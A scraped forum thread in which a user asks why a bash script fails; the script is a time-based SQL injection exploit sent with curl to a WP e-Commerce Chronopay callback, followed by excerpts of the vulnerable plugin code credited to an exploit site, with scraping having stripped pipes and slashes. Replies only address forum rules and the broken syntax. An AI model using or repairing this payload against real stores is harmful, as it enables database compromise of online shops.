Login or Register to Ask a Question and Join Our Community


Shell Programming and Scripting

Syntax error near unexpected token `('

Login to Discuss or Reply to this Discussion in Our Community

 
Thread Tools Search this Thread
Top Forums Shell Programming and Scripting Syntax error near unexpected token `('
# 1  
Old 05-02-2012
Syntax error near unexpected token `('
What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
.wp-e-commercewp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this-load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
.wp-e-commercewpsc-corewpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . 'wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . 'wpsc-merchants' . $nzshpcrt_merchant );
            }
 
 
.wp-e-commercewpsc-merchantschronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
             - this is by default '' and set only if explicitly stated
               inside Store Settings-Payments-General Settings-
               Chronopay-Edit-Security Key
             - problem is that there are more popular payment gateways enlisted (e.g.
               Google Checkout and PayPal) and if that setting is not explicitly set
               it wide opens the door to the potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill'
                        $wpdb-query(UPDATE `.WPSC_TABLE_PURCHASE_LOGS.` SET
                                            `processed` = '2',
                                            `transactid` = '.$transaction_id.',
                                            `date` = '.time().'
                                        WHERE `sessionid` = .$sessionid. LIMIT 1);
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
# 2  
Old 05-02-2012
Bumping up posts or double posting is not permitted in these forums.

Please read the rules, which you agreed to when you registered, if you have not already done so.

You may receive an infraction for this. If so, don't worry, just try to follow the rules more carefully. The infraction will expire in the near future

Thank You.

The UNIX and Linux Forums.
# 3  
Old 05-02-2012
Let's assume that the first 4 lines of code posted are the entire bash script. Lines 1,3 and 4 of the post look like bash script. Line 2 is an alien syntax unlike bash, and produced the error message. Though lines 3 and 4 look like bash syntax the content does not stand up to superficial checking.

The rest is presumably three skeleton web programs unrelated to the bash script.
Last edited by methyl; 05-02-2012 at 12:31 PM..
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. Ubuntu

Syntax error near unexpected token `('

detect_mouse_mvt.sh /home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `(' /home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')' #!/bin/bash # # fh = file('/dev/input/mice') while True: fh.read(3) print 'Mouse... (15 Replies)
Discussion started by: drew77
15 Replies

2. UNIX for Beginners Questions & Answers

Syntax error near unexpected token

Dears, While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this. test.sh: line 30: syntax error near unexpected token `done' test.sh: line 30: ` done ' #!/bin/sh # Rev. PA1 # author: eillops # date: 26-04-2018 # #... (1 Reply)
Discussion started by: Kamesh G
1 Replies

3. How to Post in the The UNIX and Linux Forums

Syntax error near unexpected token `('

I have 2 files like a.txt and b.txt and the content is as below cat a.txt 810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar 1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar 2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar 687942896 665272... (1 Reply)
Discussion started by: ranabhavish
1 Replies

4. Shell Programming and Scripting

Syntax error near unexpected token

Hi all, I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction. count=$((1)) for item in `cat test1.txt` printf %s `sed -n $((count))p test2.txt` > test3.txt count=$((count+1)) do something done I get ; ./why.sh: line 3:... (14 Replies)
Discussion started by: y33t
14 Replies

5. Shell Programming and Scripting

Syntax error near unexpected token '('

I tried to execute the code but I got this error ./Array.c: line 9: syntax error near unexpected token '(' ./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);' and #include<stdio.h> #define MAXARRAY 1000 main() { int a, nvals; nvals =... (7 Replies)
Discussion started by: sgradywhite
7 Replies

6. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

7. Shell Programming and Scripting

syntax error near unexpected token `='

Hi all, This is a script which converts hex to bin. However am finding an error while executing syntax error near unexpected token `=' `($hexfile, $binfile) = @ARGV;' I am running using ./fil.pl <hexfile> <binfile> ################################################### # # this script... (3 Replies)
Discussion started by: jaango123
3 Replies

8. UNIX for Advanced & Expert Users

syntax error near unexpected token '{

Hi, I am running the following script through cygwin and getting below mentioned error. ******************************************* #!/bin/sh # constants WORK_DIR="deploy" INFOFILE="deploy.info" INTROFILE="Intro.sh" CMGMT_PKG="com.kintana.cmgmt.deploy" DEPLOY_PREFIX="mitg" ... (2 Replies)
Discussion started by: MandyR
2 Replies

9. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

10. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies
Login or Register to Ask a Question